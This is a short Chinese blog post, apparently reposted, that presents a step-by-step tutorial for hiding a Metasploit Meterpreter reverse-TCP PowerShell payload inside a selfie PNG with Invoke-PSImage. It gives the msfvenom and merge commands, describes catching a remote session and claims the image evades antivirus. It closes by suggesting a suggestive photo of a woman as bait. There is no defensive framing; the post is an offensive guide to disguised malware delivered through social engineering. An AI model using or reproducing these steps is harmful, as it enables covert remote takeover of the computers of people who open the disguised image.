利用自拍照反弹shell

发布日期:2019-07-03 浏览次数: 6217 次

0x00:前言

继前面讲到的用(看我如何利用微信反弹shell)之后,引来了很多人的围观。确实,新颖的利用方式。很有利用价值!闲话少说。今天,利用奇思妙想的方法来反弹shell。用一张自拍照。

0x01:过程

利用工具:

https://github.com/peewpw/Invoke-PSImage

一、首先利用msf创建一个ps1脚本

代码:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.11 LPORT=6666 -f psh-reflection  -o /root/luomiweixiong.ps1

 

利用msf生成ps1脚本

二、找一张自拍图

(我这里用我自己的头像)

luomiweixiong.png

放在Invoke-PSImage目录下,方便执行命令的时候找文件

三、两者合并

两者合并

解释:

首先要执行“Import-Module .\Invoke-PSImage.ps1”命令。

再执行“Invoke-PSImage -Script .\luomiweixiong.ps1 -Image .\luomiweixiong.png -Out .\luomiwexiong2.png“命令进行两者合并。

 

第1个解释中的命令解释:导入模块。

第2个解释中的命令分解:luomiweixiong.ps1为msf生成的ps1文件。luomiweixiong.png为原来的头像文件。luomiwexiong2.png为生成后的头像文件。

生成后的文件会比原来的大。emmm  大重点是  还是显示原来的头像

四、监听

老生常谈的方式,不会的请出门左转.

百度一下

五、见证奇迹

exploit开始攻击,运行生成后的

"luomiweixiong2.png"文件,查看效果

是的。没错。获取到会话了

六、查杀

1、本地查杀    2345安全卫士表示没问题

2、在线查杀

表示没有压力

0x02:后话

其实还可以更加隐蔽的合并两者,并有更好的效果。比如诱人的小姐姐私房自拍照。

 

转自:黑白之道

 

 

 

分享到:
×

微信扫一扫分享

XML 地图 | Sitemap 地图